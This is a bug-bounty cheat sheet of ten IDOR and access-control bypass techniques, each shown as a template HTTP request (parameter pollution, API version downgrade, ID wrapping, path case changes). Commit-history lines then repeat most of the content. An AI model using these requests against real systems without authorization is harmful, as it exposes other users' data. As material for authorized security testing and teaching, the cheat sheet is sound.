AllAboutBugBounty/Insecure Direct Object References.md

## IDOR (Insecure Direct Object Reference)
1. Add parameters onto the endpoints for example, if there was
```html
GET /api/v1/getuser
[...]
```
Try this to bypass
```html
GET /api/v1/getuser?id=1234
[...]
```

2. HTTP Parameter pollution

```html
POST /api/get_profile
[...]
user_id=hacker_id&user_id=victim_id
```

3. Add .json to the endpoint

```html
GET /v2/GetData/1234
[...]
```
Try this to bypass
```html
GET /v2/GetData/1234.json
[...]
```

4. Test on outdated API Versions

```html
POST /v2/GetData
[...]
id=123
```
Try this to bypass
```html
POST /v1/GetData
[...]
id=123
```

5. Wrap the ID with an array.

```html
POST /api/get_profile
[...]
{"user_id":111}
```
Try this to bypass
```html
POST /api/get_profile
[...]
{"id":[111]}
```

6. Wrap the ID with a JSON object

```html
POST /api/get_profile
[...]
{"user_id":111}
```
Try this to bypass
```html
POST /api/get_profile
[...]
{"user_id":{"user_id":111}}
```

7. JSON Parameter Pollution

```html
POST /api/get_profile
[...]
{"user_id":"hacker_id","user_id":"victim_id"}
```

8. Try decode the ID, if the ID encoded using md5,base64,etc
```html
GET /GetUser/dmljdGltQG1haWwuY29t
[...]
```
dmljdGltQG1haWwuY29t => victim@mail.com

9. If the website using graphql, try to find IDOR using graphql!
```html
GET /graphql
[...]
```
```html
GET /graphql.php?query=
[...]
```

10. MFLAC (Missing Function Level Access Control)
```
GET /admin/profile
```
Try this to bypass
```
GET /ADMIN/profile
```

Source: [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup!
Account Takover [1] Create account IDOR (Insecure direct object references) tips and add 9 tips 2020-09-04 10:41:20 +00:00			`## IDOR (Insecure Direct Object Reference)`
			`1. Add parameters onto the endpoints for example, if there was`
			```html
			`GET /api/v1/getuser`
			`[...]`
			```
			`Try this to bypass`
			```html
			`GET /api/v1/getuser?id=1234`
			`[...]`
			```

			`2. HTTP Parameter pollution`

			```html
			`POST /api/get_profile`
			`[...]`
			`user_id=hacker_id&user_id=victim_id`
			```

			`3. Add .json to the endpoint`

			```html
			`GET /v2/GetData/1234`
			`[...]`
			```
			`Try this to bypass`
			```html
			`GET /v2/GetData/1234.json`
			`[...]`
			```

			`4. Test on outdated API Versions`

			```html
			`POST /v2/GetData`
			`[...]`
			`id=123`
			```
			`Try this to bypass`
			```html
			`POST /v1/GetData`
			`[...]`
			`id=123`
			```

			`5. Wrap the ID with an array.`

			```html
			`POST /api/get_profile`
			`[...]`
			`{"user_id":111}`
			```
			`Try this to bypass`
			```html
			`POST /api/get_profile`
			`[...]`
			`{"id":[111]}`
			```

			`6. Wrap the ID with a JSON object`

			```html
			`POST /api/get_profile`
			`[...]`
			`{"user_id":111}`
			```
			`Try this to bypass`
			```html
			`POST /api/get_profile`
			`[...]`
			`{"user_id":{"user_id":111}}`
			```

			`7. JSON Parameter Pollution`

			```html
			`POST /api/get_profile`
			`[...]`
			`{"user_id":"hacker_id","user_id":"victim_id"}`
			```

			`8. Try decode the ID, if the ID encoded using md5,base64,etc`
			```html
			`GET /GetUser/dmljdGltQG1haWwuY29t`
			`[...]`
			```
			`dmljdGltQG1haWwuY29t => victim@mail.com`

			`9. If the website using graphql, try to find IDOR using graphql!`
			```html
			`GET /graphql`
			`[...]`
			```
			```html
			`GET /graphql.php?query=`
			`[...]`
			```
IDOR [3] Add sources of the tips 2020-09-04 10:46:10 +00:00
IDOR [4] Add 1 IDOR tips 2020-09-09 15:01:15 +00:00			`10. MFLAC (Missing Function Level Access Control)`
			```
			`GET /admin/profile`
			```
			`Try this to bypass`
			```
			`GET /ADMIN/profile`
			```

IDOR [3] Add sources of the tips 2020-09-04 10:46:10 +00:00			`Source: [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup!`